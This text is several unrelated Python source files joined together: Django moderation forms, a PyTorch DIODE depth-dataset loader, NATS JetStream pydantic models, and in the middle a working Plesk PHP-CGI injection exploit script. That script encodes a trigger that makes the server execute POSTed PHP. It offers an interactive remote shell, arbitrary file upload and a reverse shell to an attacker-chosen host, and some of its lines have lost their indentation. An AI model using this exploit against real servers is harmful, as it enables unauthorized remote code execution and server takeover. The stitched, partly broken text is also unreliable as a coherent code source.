        self.fields["collection"].queryset = ModerationCollection.objects.filter(
            status=COLLECTING, author=user
        )

    def set_collection_widget(self, request):
        """Wrap the collection widget so the admin add/change/delete buttons
        appear next to it, honoring the user's ModerationCollection permissions."""
        related_modeladmin = admin.site._registry.get(ModerationCollection)
        dbfield = ModerationRequest._meta.get_field("collection")
        # Django 2.2 requires `remote_field` instead of `rel`.
        remote_field = dbfield.rel if hasattr(dbfield, 'rel') else dbfield.remote_field
        formfield = self.fields["collection"]
        formfield.widget = RelatedFieldWidgetWrapper(
            formfield.widget,
            remote_field,
            admin_site=admin.site,
            can_add_related=related_modeladmin.has_add_permission(request),
            can_change_related=related_modeladmin.has_change_permission(request),
            can_delete_related=related_modeladmin.has_delete_permission(request),
        )

    def clean_versions(self):
        """
        Process objects which are not part of an active moderation request.
        Other objects are ignored.
        """
        versions = self.cleaned_data["versions"]
        eligible_versions = []
        for version in versions:
            if all(
                [
                    is_registered_for_moderation(version.content),
                    not get_active_moderation_request(version.content),
                    is_obj_version_unlocked(version.content, self.user),
                ]
            ):
                eligible_versions.append(version.pk)
        if not eligible_versions:
            # Fix: the implicitly-concatenated message halves were missing a
            # separating space ("moderation,or is part...").
            raise forms.ValidationError(
                ungettext(
                    "Your item is either locked, not enabled for moderation, "
                    "or is part of another active moderation request",
                    "Your items are either locked, not enabled for moderation, "
                    "or are part of another active moderation request",
                    len(versions),
                )
            )
        return Version.objects.filter(pk__in=eligible_versions)
class SubmitCollectionForModerationForm(forms.Form):
    """Form submitting a whole collection for review, optionally to a
    specific member of the workflow's first-step role."""

    moderator = forms.ModelChoiceField(
        label=_("Select review group"),
        queryset=get_user_model().objects.none(),
        required=False,
    )

    def __init__(self, *args, **kwargs):
        self.collection = kwargs.pop("collection")
        self.user = kwargs.pop("user")
        super().__init__(*args, **kwargs)
        self.configure_moderator_field()

    def configure_moderator_field(self):
        # Reviewers come from the first workflow step's role; the submitter
        # themselves is excluded.
        next_role = self.collection.workflow.first_step.role
        users = next_role.get_users_queryset().exclude(pk=self.user.pk)
        self.fields["moderator"].empty_label = ugettext("Any {role}").format(
            role=next_role.name
        )
        self.fields["moderator"].queryset = users

    def clean(self):
        if not self.collection.allow_submit_for_review(user=self.user):
            self.add_error(None, _("This collection can't be submitted for a review"))
        return super().clean()

    def save(self):
        self.collection.submit_for_review(
            by_user=self.user, to_user=self.cleaned_data.get("moderator")
        )
class CancelCollectionForm(forms.Form):
    """Confirmation form for cancelling a moderation collection."""

    def __init__(self, *args, **kwargs):
        # Collection and acting user are injected by the caller.
        self.collection = kwargs.pop("collection")
        self.user = kwargs.pop("user")
        super().__init__(*args, **kwargs)

    def clean(self):
        # Refuse cancellation unless the collection permits it for this user.
        cancellable = self.collection.is_cancellable(self.user)
        if not cancellable:
            self.add_error(None, _("This collection can't be cancelled"))
        return super().clean()

    def save(self):
        self.collection.cancel(self.user)
class CollectionCommentForm(forms.ModelForm):
    """
    The author and moderation request should be pre-filled and non-editable.
    NB: Hidden fields seems to be the only reliable way to do this;
    readonly fields do not work for add, only for edit.
    """

    class Meta:
        model = CollectionComment
        fields = "__all__"
        # Pre-filled by the view; hidden so they cannot be edited in the UI.
        widgets = {"author": forms.HiddenInput(), "collection": forms.HiddenInput()}


class RequestCommentForm(forms.ModelForm):
    """
    The author and moderation request should be pre-filled and non-editable.
    NB: Hidden fields seems to be the only reliable way to do this;
    readonly fields do not work for add, only for edit.
    """

    class Meta:
        model = RequestComment
        fields = "__all__"
        # Pre-filled by the view; hidden so they cannot be edited in the UI.
        widgets = {
            "author": forms.HiddenInput(),
            "moderation_request": forms.HiddenInput(),
        }
class ModerationRequestActionInlineForm(forms.ModelForm):
    """Inline form letting a user edit only the message of their own
    moderation request actions."""

    class Meta:
        model = ModerationRequestAction
        fields = ("message",)

    def clean_message(self):
        # NOTE(review): `self.current_user` is not set anywhere in this class —
        # presumably injected by the admin/formset before validation; verify
        # against the caller.
        if self.instance and self.cleaned_data["message"] != self.instance.message:
            if self.current_user != self.instance.by_user:
                raise forms.ValidationError(_("You can only change your own comments"))
        return self.cleaned_data["message"]
|
import os.path as osp
from itertools import chain
import json
from torch.utils.data import Dataset
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
'''
The json metadata for DIODE is laid out as follows:
train:
outdoor:
scene_000xx:
scan_00yyy:
- 000xx_00yyy_indoors_300_010
- 000xx_00yyy_indoors_300_020
- 000xx_00yyy_indoors_300_030
scene_000kk:
_analogous_
val:
_analogous_
test:
_analogous_
'''
# Dataset splits and scene types accepted when querying DIODE metadata.
_VALID_SPLITS = ('train', 'val', 'test')
_VALID_SCENE_TYPES = ('indoors', 'outdoor')
def check_and_tuplize_tokens(tokens, valid_tokens):
    """Normalize *tokens* to a sequence and validate each entry.

    A single (non tuple/list) token is wrapped in a 1-tuple; an existing
    tuple/list is returned unchanged.  Raises ValueError for any token not
    in *valid_tokens* — the original used ``assert``, which is silently
    stripped under ``python -O``.
    """
    if not isinstance(tokens, (tuple, list)):
        tokens = (tokens,)
    for split in tokens:
        if split not in valid_tokens:
            raise ValueError(
                'invalid token {!r}; expected one of {}'.format(split, valid_tokens)
            )
    return tokens
def enumerate_paths(src):
    '''flatten out a nested dictionary into an iterable
    DIODE metadata is a nested dictionary;
    One could easily query a particular scene and scan, but sequentially
    enumerating files in a nested dictionary is troublesome. This function
    recursively traces out and aggregates the leaves of a tree.
    '''
    if isinstance(src, list):
        # Leaves are already flat lists of file stems.
        return src
    if isinstance(src, dict):
        flattened = []
        for prefix, subtree in src.items():
            # Prefix every leaf under this key with the key as a path component.
            flattened.extend(
                osp.join(prefix, leaf) for leaf in enumerate_paths(subtree)
            )
        return flattened
    raise ValueError('do not accept data type {}'.format(type(src)))
def plot_depth_map(dm, validity_mask):
    """Display a log-scaled depth map, rendering invalid pixels in black."""
    valid = validity_mask > 0
    # Clip depths to [0.5, min(300, 99th percentile)] before log-scaling.
    lo = 0.5
    hi = min(300, np.percentile(dm, 99))
    if hi < lo:
        # Percentile fell below the floor; swap so lo <= hi.
        lo, hi = hi, lo
    depth = np.clip(dm, lo, hi)
    depth = np.log(depth, where=valid)
    depth = np.ma.masked_where(~valid, depth)
    palette = plt.cm.jet
    palette.set_bad(color='black')
    plt.imshow(depth, cmap=palette, vmax=np.log(hi))
    plt.show()
def plot_normal_map(normal_map):
    """Display a surface-normal map as an RGB image."""
    # NOTE(review): `[:, ::, :]` is a full-copy slice with no effect on shape.
    normal_viz = normal_map[:, ::, :]
    # Pixels whose channel sum is exactly 0 (no normal) are pushed to the
    # array minimum so they render as the darkest value.
    normal_viz = normal_viz + np.equal(np.sum(normal_viz, 2,
                                              keepdims=True), 0.).astype(np.float32) * np.min(normal_viz)
    # NOTE(review): dividing by 2. assumes values span a range of width 2
    # (e.g. unit normals in [-1, 1]) — confirm against the data pipeline.
    normal_viz = (normal_viz - np.min(normal_viz)) / 2.
    plt.axis('off')
    plt.imshow(normal_viz)
class DIODE(Dataset):
    """PyTorch dataset over DIODE images, depth maps and depth-validity masks.

    Enumerates ``<split>/<scene_type>/.../<stem>`` entries from the JSON
    metadata file and resolves them relative to ``data_root``.
    """

    def __init__(self, meta_fname, data_root, splits, scene_types):
        self.data_root = data_root
        self.splits = check_and_tuplize_tokens(
            splits, _VALID_SPLITS
        )
        self.scene_types = check_and_tuplize_tokens(
            scene_types, _VALID_SCENE_TYPES
        )
        with open(meta_fname, 'r') as f:
            self.meta = json.load(f)
        # Flatten the nested metadata into relative paths, one per sample.
        imgs = []
        for split in self.splits:
            for scene_type in self.scene_types:
                _curr = enumerate_paths(self.meta[split][scene_type])
                _curr = map(lambda x: osp.join(split, scene_type, x), _curr)
                imgs.extend(list(_curr))
        self.imgs = imgs

    def __len__(self):
        return len(self.imgs)

    def __getitem__(self, index):
        """Return (image array, depth array, depth-validity mask) for a sample."""
        im = self.imgs[index]
        im_fname = osp.join(self.data_root, '{}.png'.format(im))
        de_fname = osp.join(self.data_root, '{}_depth.npy'.format(im))
        de_mask_fname = osp.join(self.data_root, '{}_depth_mask.npy'.format(im))
        # Fix: the original opened osp.join(self.data_root, im_fname), joining
        # data_root a second time (im_fname is already rooted) — inconsistent
        # with de_fname/de_mask_fname and wrong for a relative data_root.
        im = np.array(Image.open(im_fname))
        de = np.load(de_fname).squeeze()
        de_mask = np.load(de_mask_fname)
        return im, de, de_mask
<filename>plesk-xpl.py
#!/usr/bin/python
#############################
# ABOUT #
#############################
##########################################################
# Plesk PHP Inject0r Exploit v1.0 #
# Greets to kingcope for finding orig. bug :3 #
# Author: WhoAmi #
# Site: Https://www.youtube.com/c/spynet #
# Notes: This literally took like 10 minutes to port #
##########################################################
#############################
# LIBRARIES #
#############################
import sys, os
import payloads
from payloads import all
import argparse
import requests
import sys
#############################
# HELP #
#############################
# Renamed from `help` to avoid shadowing the builtin of the same name.
banner = '''
| Plesk PHP Inject0r EXPLOIT v1.0 |
| Found by : kingcope |
| Coded by : WhoAMi [CLAYTEAM] |
| Contact : <EMAIL> |
'''
parser = argparse.ArgumentParser(description=banner)
parser.add_argument("--target",help="Target IP", required=True)
# Fix: the option string was "--mode " (trailing space), which breaks the
# generated dest so `args.mode` below would raise AttributeError.
parser.add_argument("--mode", help="RSH (reverse shell), UP (upload) or SH (inline shell)", default="SH")
parser.add_argument("--lfile", help="File to Upload (full path)")
parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
parser.add_argument("--lhost", help="Host to connect back to", default="127.0.0.1")
parser.add_argument("--lport", help="Port to connect back to", default="4444")
parser.add_argument("--stype", help="Reverse Shell Type - Python or Perl", default="perl")
args = parser.parse_args()
# Pull the parsed options into module-level globals used by the rest of the script.
target = args.target
mode = args.mode
localfile = args.lfile
remotefile = args.rfile
lhost = args.lhost
lport = args.lport
stype = args.stype
# Percent-encoded PHP-CGI argument-injection path.  Decoded, the request reads:
#   /phppath/php?-d allow_url_include=on -d safe_mode=off
#   -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none
#   -d auto_prepend_file=php://input -n
# i.e. PHP is told to prepend php://input, so the POST body is executed as PHP.
trigger = "/%70%68%70%70%61%74%68/%70%68%70?"
trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
# All payloads in this script are POSTed to this URL.
url = "http://" + target + trigger
def genrshell(lhost, lport, stype):
    """Build a one-line reverse-shell command for the requested interpreter.

    Fix: the original fell through for an unrecognised *stype* and hit
    ``return rshell`` with the name unbound (UnboundLocalError); raise a
    clear ValueError instead.
    """
    if stype == "perl":
        return payloads.linux.perl.reverse_oneline(lhost, lport)
    if stype == "python":
        return payloads.linux.python.reverse_oneline(lhost, lport)
    raise ValueError("unsupported shell type: %s" % stype)
def genphp(cmd):
    """Wrap a shell command in a base64-encoded PHP eval payload.

    NOTE: uses str.encode('base64'), which exists only on Python 2.
    """
    rawphp = """echo "Content-Type:text/html\r\n\r\n"; system('%s');""" %(cmd) # to return results :D
    encodedphp = rawphp.encode('base64')
    payload = """<?php eval(base64_decode('%s'));die(); ?>""" %(encodedphp) # Create a payload
    return payload #return the evil
def genencphp(cmd):
    """Wrap a shell command in a double-base64-encoded PHP system() payload.

    NOTE: uses str.encode('base64'), which exists only on Python 2.  The
    newline stripping between the two encode passes keeps the payload on a
    single line.
    """
    encoded = cmd.encode('base64')
    encoded = encoded.strip()
    encoded = encoded.replace('\n', '')
    encoded = encoded.encode('base64')
    encoded = encoded.strip()
    encoded = encoded.replace('\n', '') #
    raw = """system(base64_decode(base64_decode('%s')));""" %(encoded)
    payload = """<?php %s ?>""" %(raw) # Make a bleep bleep
    return payload
def test(url): # This whole function is ugly as sin
php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('WhoAmi'); ?>""" # I hope they even md5
WhoAmi = requests.post(url, php) # hahaha no, they dont.
if "9a74152b6df9f65345be1cbede630897" in WhoAmi.text: # hax0r it na0?
print "%s vuln!" %(ip) # yes, this ddos number is wide open
else:
print "%s not vuln" %(ip)
def shell():
while True: # because. infinite win
try: # there is no try, there is only do, and do not...
cmd = raw_input("shell:~$ ")
if cmd == "quit": #rip
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit": #rip
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(cmd)
CLAY = requests.post(url, payload)
print CLAY.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(-5)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
def upload(url, localfile, remotefile):
    """Read *localfile*, base64 it (Python 2 codec), and POST a PHP payload
    that writes the decoded contents to *remotefile* on the server."""
    f = open(localfile, "r")
    rawfiledata = f.read()
    encodedfiledata = rawfiledata.encode('base64')
    phppayload = """<?php
$f = fopen("%s", "w");
$x = base64_decode('%s');
fwrite($f, "$x");
fclose($f);
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
    print "[+] Uploading File"
    requests.post(url, phppayload) # this is why I love the python requests library
    print "[+] Upload should be complete"
    sys.exit(0)
def rshell():
    """Generate a reverse-shell one-liner for lhost:lport, wrap it in the
    double-encoded PHP payload, POST it, and exit."""
    rshell = genrshell(lhost, lport, stype)
    print "[+] Generating Payload"
    payload = genencphp(rshell)
    print "[+] Sending reverse shell to %s:%s" %(lhost, lport)
    requests.post(url, payload) # LoL HaCk3d!
    print "[<3] Exiting..."
    sys.exit(0)
def main(target, mode):
    """Dispatch on --mode: UP = upload, SH = inline shell, RSH = reverse shell."""
    print "[+] Target is: %s" %(target)
    if mode == "UP":
        upload(url, localfile, remotefile)
    elif mode == "SH":
        shell()
    elif mode == "RSH":
        rshell()
    else:
        print "[-] Mode Invalid... Exit!"
        sys.exit(0)

# Script entry point: runs immediately with the parsed CLI options.
main(target, mode)
|
<filename>src/jsm/models/streams.py
# Copyright 2021 - <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import annotations
from datetime import datetime
from enum import Enum
from typing import Any, Dict, List, Optional
from pydantic import Field, root_validator, validator
from .base import BaseRequest, BaseResponse, JetstreamModel
from .clusters import Cluster
from .messages import Message
class Retention(str, Enum):
    """How message retention is considered"""

    limits = "limits"        # retain until size/age/count limits are hit
    interest = "interest"    # retain while consumers show interest
    workqueue = "workqueue"  # retain until consumed once


class Storage(str, Enum):
    """The type of storage backend"""

    file = "file"
    memory = "memory"


class Discard(str, Enum):
    """Discard policy when a stream reaches it's limits"""

    old = "old"  # drop oldest messages to make room
    new = "new"  # reject new messages
class Placement(JetstreamModel):
    """Placement directives to consider when placing replicas of this stream"""

    cluster: str = Field(
        ...,
        description="The desired cluster name to place the stream",
        min_length=1,
    )
    tags: Optional[List[str]] = Field(
        None,
        description="Tags required on servers hosting this stream",
    )


class External(JetstreamModel):
    """Reference to a stream API exposed by another account or JetStream domain."""

    api: str = Field(
        ...,
        description="The subject prefix that imports the other account/domain $JS.API.CONSUMER.> subjects",
    )
    deliver: Optional[str] = Field(
        None, description="The delivery subject to use for the push consumer"
    )
class Mirror(JetstreamModel):
    """Configuration for mirroring another stream into this one.

    (The original docstring here was copy-pasted from Placement; this class
    matches the shape referenced by ``Config.mirror``.)
    """

    name: str = Field(
        ...,
        description="Stream name",
        regex=r"^[^.*>]+$",
        min_length=1,
    )
    opt_start_seq: Optional[int] = Field(
        None,
        description="Sequence to start replicating from",
        ge=0,
    )
    opt_start_time: Optional[str] = Field(
        None,
        description="Time stamp to start replicating from",
    )
    filter_subject: Optional[str] = Field(
        None,
        description="Replicate only a subset of messages based on filter",
    )
    external: Optional[External] = Field(
        None,
        description="Configuration referencing a stream source in another account or JetStream domain",
    )


class Source(JetstreamModel):
    """A stream whose messages are sourced (replicated) into this stream."""

    name: str = Field(
        ...,
        description="Stream name",
        regex=r"^[^.*>]+$",
        min_length=1,
    )
    opt_start_seq: Optional[int] = Field(
        None,
        description="Sequence to start replicating from",
        ge=0,
    )
    opt_start_time: Optional[str] = Field(
        None,
        description="Time stamp to start replicating from",
    )
    filter_subject: Optional[str] = Field(
        None,
        description="Replicate only a subset of messages based on filter",
    )
    external: Optional[External] = Field(
        None,
        description="Configuration referencing a stream source in another account or JetStream domain",
    )
class Config(JetstreamModel):
    """Stream configuration
    References:
        Streams - [NATS Docs](https://docs.nats.io/jetstream/concepts/streams)
    """

    name: Optional[str] = Field(
        None,
        description="A unique name for the Stream, empty for Stream Templates.",
        regex=r"^[^.*>]*$",
        min_length=0,
    )
    # NOTE(review): `min_length` applies to strings; for list fields such as
    # this one, pydantic v1 uses `min_items` — confirm which version/behavior
    # is intended.
    subjects: Optional[List[str]] = Field(
        None,
        description="A list of subjects to consume, supports wildcards. Must be empty when a mirror is configured. May be empty when sources are configured.",
        min_length=0,
    )
    retention: Retention = Field(
        ...,
        description="How messages are retained in the Stream, once this is exceeded old messages are removed.",
    )
    max_consumers: int = Field(
        ...,
        description="How many Consumers can be defined for a given Stream. -1 for unlimited.",
        ge=-1,
    )
    max_msgs: int = Field(
        ...,
        description="How many messages may be in a Stream, oldest messages will be removed if the Stream exceeds this size. -1 for unlimited.",
        ge=-1,
    )
    max_msgs_per_subject: Optional[int] = Field(
        -1,
        description="For wildcard streams ensure that for every unique subject this many messages are kept - a per subject retention limit",
        ge=-1,
    )
    max_bytes: int = Field(
        ...,
        description="How big the Stream may be, when the combined stream size exceeds this old messages are removed. -1 for unlimited.",
        ge=-1,
    )
    max_age: int = Field(
        ...,
        description="Maximum age of any message in the stream, expressed in nanoseconds. 0 for unlimited.",
        ge=0,
    )
    max_msg_size: Optional[int] = Field(
        -1,
        description="The largest message that will be accepted by the Stream. -1 for unlimited.",
        ge=-1,
    )
    storage: Storage = Field(
        ...,
        description="The storage backend to use for the Stream.",
    )
    num_replicas: int = Field(
        ...,
        description="How many replicas to keep for each message.",
        ge=1,
        le=5,
    )
    no_ack: Optional[bool] = Field(
        False,
        description="Disables acknowledging messages that are received by the Stream.",
    )
    template_owner: Optional[str] = Field(
        None,
        description="When the Stream is managed by a Stream Template this identifies the template that manages the Stream.",
    )
    discard: Optional[Discard] = Field(
        "old",
        description="When a Stream reach it's limits either old messages are deleted or new ones are denied",
    )
    duplicate_window: Optional[int] = Field(
        0,
        description="The time window to track duplicate messages for, expressed in nanoseconds. 0 for default",
        ge=0,
    )
    placement: Optional[Placement] = Field(
        None,
        description="Placement directives to consider when placing replicas of this stream, random placement when unset",
    )
    mirror: Optional[Mirror] = Field(
        None,
        description="Maintains a 1:1 mirror of another stream with name matching this property. When a mirror is configured subjects and sources must be empty.",
    )
    sources: Optional[List[Source]] = Field(
        None,
        description="List of Stream names to replicate into this Stream",
    )
class DeletedItem(JetstreamModel):
    """A single deleted message sequence number (non-negative)."""

    __root__: int = Field(..., ge=0)


class Lost(JetstreamModel):
    """Records messages that were damaged and unrecoverable."""

    msgs: Optional[List[int]] = Field(
        None,
        description="The messages that were lost",
        # When field is a list, "ge" constraint is verified for each member
        ge=0,
    )
    bytes: Optional[int] = Field(
        None,
        description="The number of bytes that were lost",
    )
class State(JetstreamModel):
    """Current runtime state of a stream: counts, sequence range, losses."""

    messages: int = Field(
        ...,
        description="Number of messages stored in the Stream",
        ge=0,
    )
    bytes: int = Field(
        ...,
        description="Combined size of all messages in the Stream",
        ge=0,
    )
    first_seq: int = Field(
        ...,
        description="Sequence number of the first message in the Stream",
        ge=0,
    )
    first_ts: Optional[datetime] = Field(
        None,
        description="The timestamp of the first message in the Stream",
    )
    last_seq: int = Field(
        ...,
        description="Sequence number of the last message in the Stream",
    )
    last_ts: Optional[datetime] = Field(
        None,
        description="The timestamp of the last message in the Stream",
    )
    deleted: Optional[List[DeletedItem]] = Field(
        None,
        description="IDs of messages that were deleted using the Message Delete API or Interest based streams removing messages out of order",
    )
    num_deleted: Optional[int] = Field(
        None,
        description="The number of deleted messages",
        ge=0,
    )
    lost: Optional[Lost] = Field(
        None,
        description="Records messages that were damaged and unrecoverable",
    )
    consumer_count: int = Field(
        ...,
        description="Number of Consumers attached to the Stream",
        ge=0,
    )
class PubAck(JetstreamModel):
    """Acknowledgement returned by JetStream when a message is published."""

    stream: str = Field(..., description="Name of the stream")
    seq: int = Field(..., description="Sequence of the message in the steam")
    domain: Optional[str] = Field(
        None, description="JetStream domain which acknowledged the message"
    )
    # True when the server recognised the message as a duplicate.
    duplicate: Optional[bool] = None


class IoNatsJetstreamApiV1StreamItem(JetstreamModel):
    """Full description of one stream: config, state, lineage and cluster info."""

    config: Config = Field(
        ...,
        description="The active configuration for the Stream",
    )
    state: State = Field(
        ...,
        description="Detail about the current State of the Stream",
    )
    created: str = Field(
        ...,
        description="Timestamp when the stream was created",
    )
    mirror: Optional[Mirror] = Field(
        None, description="Information about an upstream stream source in a mirror"
    )
    sources: Optional[List[Source]] = Field(
        None, description="Streams being sourced into this Stream"
    )
    cluster: Optional[Cluster] = None
class IoNatsJetstreamApiV1StreamCreateResponse(
    IoNatsJetstreamApiV1StreamItem, BaseResponse
):
    """Stream item payload returned by the stream-create API call."""

    pass


class IoNatsJetstreamApiV1StreamInfoResponse(
    IoNatsJetstreamApiV1StreamItem, BaseResponse
):
    """Stream item payload returned by the stream-info API call."""

    pass


class IoNatsJetstreamApiV1StreamUpdateResponse(
    IoNatsJetstreamApiV1StreamItem, BaseResponse
):
    """Stream item payload returned by the stream-update API call."""

    pass
class IoNatsJetstreamApiV1StreamListResponse(BaseResponse):
    """Paginated response listing full stream items."""

    total: int = Field(
        ...,
        description="Total number of streams without regard to offset or limit",
        ge=0,
    )
    offset: int = Field(
        ...,
        description="Number of streams to skip",
        ge=0,
    )
    limit: int = Field(
        ...,
        description="Maximum number of streams to return",
        ge=0,
    )
    # Mutable default is safe here: pydantic deep-copies field defaults per instance
    streams: List[IoNatsJetstreamApiV1StreamItem] = Field(
        [],
        description="A list of streams",
    )
class IoNatsJetstreamApiV1StreamNamesResponse(BaseResponse):
    """Paginated response listing stream names only."""

    total: int = Field(
        ...,
        description="Total number of streams without regard to offset or limit",
        ge=0,
    )
    offset: int = Field(
        ...,
        description="Number of streams to skip",
        ge=0,
    )
    limit: int = Field(
        ...,
        description="Maximum number of streams to return",
        ge=0,
    )
    streams: List[str] = Field(
        [],
        description="A list of stream names",
    )
    @validator("streams", always=True, pre=True)
    def ensure_streams(cls, v: Any) -> Any:
        """Coerce a JSON `null` streams field into an empty list before validation."""
        if v is None:
            return []
        return v
class IoNatsJetstreamApiV1StreamDeleteResponse(BaseResponse):
    """Response to a stream delete request."""

    success: bool
class IoNatsJetstreamApiV1StreamMsgGetResponse(BaseResponse):
    """Response carrying a single message fetched from a stream."""

    message: Message
class IoNatsJetstreamApiV1StreamMsgDeleteResponse(BaseResponse):
    """Response to a single-message delete request."""

    success: bool
class IoNatsJetstreamApiV1StreamPurgeResponse(BaseResponse):
    """Response to a stream purge request."""

    success: bool
    purged: int = Field(
        ...,
        description="Number of messages purged from the Stream",
        ge=0,
    )
class IoNatsJetstreamApiV1StreamSnapshotResponse(BaseResponse):
    """Response to a snapshot request: the stream's config and state at snapshot time."""

    config: Config
    state: State
class CreateRequestConfig(JetstreamModel):
    """Stream configuration submitted with create and update requests.

    Shared base of the stream create/update request models below; mirrors the
    JetStream stream config schema (limits use -1 or 0 for "unlimited").
    """

    name: Optional[str] = Field(
        None,
        description="A unique name for the Stream, empty for Stream Templates.",
        regex=r"^[^.*>]*$",
        min_length=0,
    )
    subjects: Optional[List[str]] = Field(
        None,
        description="A list of subjects to consume, supports wildcards. Must be empty when a mirror is configured. May be empty when sources are configured.",
        min_length=0,
    )
    retention: Retention = Field(
        ...,
        description="How messages are retained in the Stream, once this is exceeded old messages are removed.",
    )
    max_consumers: int = Field(
        ...,
        description="How many Consumers can be defined for a given Stream. -1 for unlimited.",
        ge=-1,
    )
    max_msgs: int = Field(
        ...,
        description="How many messages may be in a Stream, oldest messages will be removed if the Stream exceeds this size. -1 for unlimited.",
        ge=-1,
    )
    max_msgs_per_subject: Optional[int] = Field(
        -1,
        description="For wildcard streams ensure that for every unique subject this many messages are kept - a per subject retention limit",
        ge=-1,
    )
    max_bytes: int = Field(
        ...,
        description="How big the Stream may be, when the combined stream size exceeds this old messages are removed. -1 for unlimited.",
        ge=-1,
    )
    max_age: int = Field(
        ...,
        description="Maximum age of any message in the stream, expressed in nanoseconds. 0 for unlimited.",
        ge=0,
    )
    max_msg_size: Optional[int] = Field(
        -1,
        description="The largest message that will be accepted by the Stream. -1 for unlimited.",
        ge=-1,
    )
    storage: Storage = Field(
        ..., description="The storage backend to use for the Stream."
    )
    num_replicas: int = Field(
        ...,
        description="How many replicas to keep for each message.",
        ge=1,
        le=5,
    )
    no_ack: Optional[bool] = Field(
        False,
        description="Disables acknowledging messages that are received by the Stream.",
    )
    template_owner: Optional[str] = Field(
        None,
        description="When the Stream is managed by a Stream Template this identifies the template that manages the Stream.",
    )
    discard: Optional[Discard] = Field(
        "old",
        description="When a Stream reach it's limits either old messages are deleted or new ones are denied",
    )
    duplicate_window: Optional[int] = Field(
        0,
        description="The time window to track duplicate messages for, expressed in nanoseconds. 0 for default",
        ge=0,
    )
    placement: Optional[Placement] = Field(
        None,
        description="Placement directives to consider when placing replicas of this stream, random placement when unset",
    )
    mirror: Optional[Mirror] = Field(
        None,
        description="Maintains a 1:1 mirror of another stream with name matching this property. When a mirror is configured subjects and sources must be empty.",
    )
    sources: Optional[List[Source]] = Field(
        None, description="List of Stream names to replicate into this Stream"
    )
class IoNatsJetstreamApiV1StreamCreateRequest(CreateRequestConfig, BaseRequest):
    """Request to create a stream; body is the full stream configuration."""

    pass
class IoNatsJetstreamApiV1StreamUpdateRequest(CreateRequestConfig, BaseRequest):
    """Request to update a stream; body is the full stream configuration."""

    pass
class IoNatsJetstreamApiV1StreamInfoRequest(BaseRequest):
    """Request for detailed information about a stream."""

    deleted_details: Optional[bool] = Field(
        None,
        description="When true will result in a full list of deleted message IDs being returned in the info response",
    )
class IoNatsJetstreamApiV1StreamListRequest(BaseRequest):
    """Paginated request listing full stream items."""

    offset: Optional[int] = Field(
        None,
        description="Number of streams to skip",
        ge=0,
    )
class IoNatsJetstreamApiV1StreamNamesRequest(BaseRequest):
    """Paginated request listing stream names only."""

    offset: Optional[int] = Field(
        None,
        description="Number of streams to skip",
        ge=0,
    )
class IoNatsJetstreamApiV1StreamMsgGetRequest(BaseRequest):
    """Request to fetch a single message from a stream.

    Exactly one of `seq` or `last_by_subj` must be provided; a root validator
    enforces this mutual exclusion.
    """

    seq: Optional[int] = Field(
        None,
        description="Stream sequence number of the message to retrieve. Cannot be combined with last_by_subj",
    )
    last_by_subj: Optional[str] = Field(
        None,
        description="Retrieves the last message for a given subject, cannot be combined with seq",
    )
    @root_validator
    def check_exclusive_params(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        """Ensure exactly 1 parameter is set between 'seq' and 'last_by_subj'"""
        seq = values.get("seq", None)
        last_by_subj = values.get("last_by_subj", None)
        # Compare seq against None explicitly: the previous truthiness check
        # treated seq=0 as "not provided", so seq=0 combined with last_by_subj
        # slipped past the mutual-exclusion check. An empty last_by_subj string
        # still counts as "not provided", preserving prior behavior.
        if seq is not None and last_by_subj:
            raise ValueError(
                "Both 'seq' and 'last_by_subj' arguments cannot be specified at same time"
            )
        if seq is None and not last_by_subj:
            raise ValueError(
                "Either 'seq' or 'last_by_subj' argument must be specified."
            )
        return values
class IoNatsJetstreamApiV1StreamMsgDeleteRequest(BaseRequest):
    """Request to delete a single message from a stream."""

    seq: int = Field(
        ...,
        description="Stream sequence number of the message to delete",
    )
    no_erase: Optional[bool] = Field(
        None,
        description="Default will securely remove a message and rewrite the data with random data, set this to true to only remove the message",
    )
class IoNatsJetstreamApiV1StreamPurgeRequest(BaseRequest):
    """Request to purge messages from a stream.

    Per the field descriptions, `seq` and `keep` are mutually exclusive; either
    may be combined with `filter`. No validator enforces this client-side.
    """

    filter: Optional[str] = Field(
        None, description="Restrict purging to messages that match this subject"
    )
    seq: Optional[int] = Field(
        None,
        description="Purge all messages up to but not including the message with this sequence. Can be combined with subject filter but not the keep option",
    )
    keep: Optional[int] = Field(
        None,
        description="Ensures this many messages are present after the purge. Can be combined with the subject filter but not the sequence",
    )
class IoNatsJetstreamApiV1StreamSnapshotRequest(BaseRequest):
    """Request to snapshot a stream, delivering chunks to a NATS subject."""

    deliver_subject: str = Field(
        ...,
        description="The NATS subject where the snapshot will be delivered",
        min_length=1,
    )
    no_consumers: Optional[bool] = Field(
        None,
        description="When true consumer states and configurations will not be present in the snapshot",
    )
    chunk_size: Optional[int] = Field(
        None,
        description="The size of data chunks to send to deliver_subject",
        ge=1024,
    )
    jsck: Optional[bool] = Field(
        False,
        description="Check all message's checksums prior to snapshot",
    )
|
# Copyright 2021 The Fairseq Authors and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
